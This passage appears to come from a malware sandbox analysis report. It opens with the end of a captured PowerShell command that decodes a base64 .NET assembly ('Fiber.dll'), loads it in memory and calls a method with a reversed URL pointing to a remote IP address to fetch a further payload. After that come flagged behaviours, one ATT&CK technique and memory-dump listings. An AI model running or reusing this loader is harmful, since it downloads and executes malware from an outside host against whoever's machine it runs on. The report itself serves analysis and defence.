4AeQBOAGEAbQBlAAAAAAAAAAAAKgABAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAAAAAAAwAAgAAQBGAGkAbABlAFYAZQByAHMAaQBvAG4AAAAAADEALgAwAC4AMAAuADAAAAA0AAoAAQBJAG4AdABlAHIAbgBhAGwATgBhAG0AZQAAAEYAaQBiAGUAcgAuAGQAbABsAAAAJgABAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAAAAAACoAAQABAEwAZQBnAGEAbABUAHIAYQBkAGUAbQBhAHIAawBzAAAAAAAAAAAAPAAKAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAEYAaQBiAGUAcgAuAGQAbABsAAAAIgABAAEAUAByAG8AZAB1AGMAdABOAGEAbQBlAAAAAAAAAAAANAAIAAEAUAByAG8AZAB1AGMAdABWAGUAcgBzAGkAbwBuAAAAMQAuADAALgAwAC4AMAAAADgACAABAEEAcwBzAGUAbQBiAGwAeQAgAFYAZQByAHMAaQBvAG4AAAAxAC4AMAAuADAALgAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABAAAAMAAAAPDcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA');[System.AppDomain]::CurrentDomain.Load($rOWg).GetType('Fiber.Home').GetMethod('VAI').Invoke($null, [object[]] ('fdp.tnemucod/tem/421.402.78.212//:ptth'))
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:844

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/844-60-0x000000001B250000-0x000000001B532000-memory.dmp

Filesize
2.9MB

Download
memory/844-61-0x0000000002390000-0x0000000002398000-memory.dmp

Filesize
32KB

Download
memory/844-62-0x0000000002670000-0x00000000026F0000-memory.dmp

Filesize
512KB

Download
memory/844-63-0x0000000002670000-0x00000000026F0000-memory.dmp

Filesize
512KB

Download
memory/844-64-0x0000000002670000-0x00000000026F0000-memory.dmp

Filesize
512KB

Download
memory/844-65-0x0000000002760000-0x000000000276A000-memory.dmp

Filesize
40KB

Download
memory/844-66-0x0000000002670000-0x00000000026F0000-memory.dmp

Filesize
512KB

Download

Analysis

Sharing